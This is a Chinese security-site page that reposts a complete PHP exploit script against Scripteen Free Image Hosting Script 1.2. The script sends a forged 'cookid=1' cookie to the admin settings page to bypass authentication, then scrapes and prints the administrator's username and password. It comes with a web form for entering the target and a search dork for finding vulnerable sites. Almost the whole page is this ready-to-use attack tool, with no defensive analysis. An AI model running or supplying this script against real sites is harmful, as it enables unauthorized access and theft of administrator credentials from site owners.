• linkedu视频
  • 平面设计
  • 电脑入门
  • 操作系统
  • 办公应用
  • 电脑硬件
  • 动画设计
  • 3D设计
  • 网页设计
  • CAD设计
  • 影音处理
  • 数据库
  • 程序设计
  • 认证考试
  • 信息管理
  • 信息安全
菜单
linkedu.com
  • 网页制作
  • 数据库
  • 程序设计
  • 操作系统
  • CMS教程
  • 游戏攻略
  • 脚本语言
  • 平面设计
  • 软件教程
  • 网络安全
  • 电脑知识
  • 服务器
  • 视频教程
  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链
您的位置:首页 > 网络安全 >Exploit > Scripteen Free Image Hosting Script 1.2 (cookie) Pass Grabber Exploit

Scripteen Free Image Hosting Script 1.2 (cookie) Pass Grabber Exploit

作者:佚名 字体:[增加 减小] 来源:互联网

佚名 向大家分享了Scripteen Free Image Hosting Script 1.2 (cookie) Pass Grabber Exploit ,其中包含Scripteen Free Image Hosting Script 1.2 (cookie) Pass Grabber Exploit 等知识点,遇到此问题的同学们可以参考下
<?php
/*
Coded By RMx - Liz0zim
BiyoSecurity.Com & Coderx.org
Ki zava Ki Zava :)
Thanx : Crackers_Child - TR_IP - Volqan - All SQL Low3rz
*/
error_reporting("E_ALL");
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
$desen='|value="(.*)"|siU';

function yolla($host,$paket)
{
global $veri;
$ac=fsockopen(gethostbyname($host),80);
if (!$ac) {
echo 'Unable to connect to server '.$host.':80'; exit;//Bağlanamaz ise
}
fputs($ac,$paket);
$veri="";
while (!feof($ac)) {
$veri.=fread($ac,1);

}
fclose($ac);
}
?>
<h2>Scripteen Free Image Hosting Script V1.2.* (cookie) Admin Password Grabber Exploit</h2>
<p>Coded By RMx - Liz0ziM</p>
<p>Web:<a href="http://www.biyosecurity.com" target="_blank">www.biyosecurity.com</a> </p>
<p>Dork:"Powered by Scripteen Free Image Hosting Script V1.2"</p>
<form method="POST" action="">
<p>TARGET HOST:
<input name="host" type="text" />
Example:<strong>www.xxxx.com</strong></p>
<p>TARGET PATH: <input name="klasor" type="text" />
Example:<strong>/</strong> or <strong>/scriptpath/</strong> </p>
<p><input name="yolla" type="submit" value="Send" /></p>
</form><br />
<? if($_POST[yolla]){
$host=$_POST[host];
$klasor=$_POST[klasor];
$admin=$_POST[admin];
$p=$klasor."admin/settings.php";
echo '<font color="red"><b>Sending Exploit..</b></font><br>';
$packet ="GET ".$p." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: cookid=1\r\n";
$packet.="Connection: Close\r\n\r\n";
yolla($host,$packet);
preg_match_all($desen,$veri,$cik);
$ad=$cik[1][0];
$sifre=$cik[1][1];
if($ad AND $sifre){
echo '
<font color="green">Exploit succeeded...</font ><br>
Admin Username:<b>'.$ad.'</b><br>
Admin Password:<b>'.$sifre.'</b><br>';
}
else
{
echo '<font color="red">Exploit Failed !</font>';
}
}

?>
</div>

您可能想查找下面的文章:

相关文章

  • MS Windows DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption
  • MojoPersonals (mojoClassified.cgi mojo) Blind SQL Injection Exploit
  • MS Windows (.doc File) Malformed Pointers Denial of Service Exploit
  • Maian Search
  • Friendly Technologies (fwRemoteCfg.dll) ActiveX Command Exec Exploit
  • WebCMS Portal Edition (id) Remote SQL Injection Vulnerability
  • HockeySTATS Online 2.0 Multiple Remote SQL Injection Vulnerabilities
  • Maian Greetings 2.1 Insecure Cookie Handling Vulnerability
  • Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability
  • Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit

文章分类

  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链

最近更新的内容

    • File Store PRO 3.2 Multiple Blind SQL Injection Vulnerabilities
    • IntelliTamper 2.07/2.08 Beta 4 A HREF Remote Buffer Overflow Exploit
    • Ultra Office ActiveX Control Remote Buffer Overflow Exploit
    • Kaminsky DNS Cache Poisoning Flaw Exploit for Domains
    • IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit
    • Joomla Component EZ Store Remote Blind SQL Injection Exploit
    • Acoustica Mixcraft
    • Windows Media Encoder wmex.dll ActiveX BOF Exploit (MS08-053)
    • Debian Sarge Multiple IMAP Server Denial of Service Exploit
    • HockeySTATS Online 2.0 Multiple Remote SQL Injection Vulnerabilities

关于我们 - 联系我们 - 免责声明 - 网站地图

©2020-2025 All Rights Reserved. linkedu.com 版权所有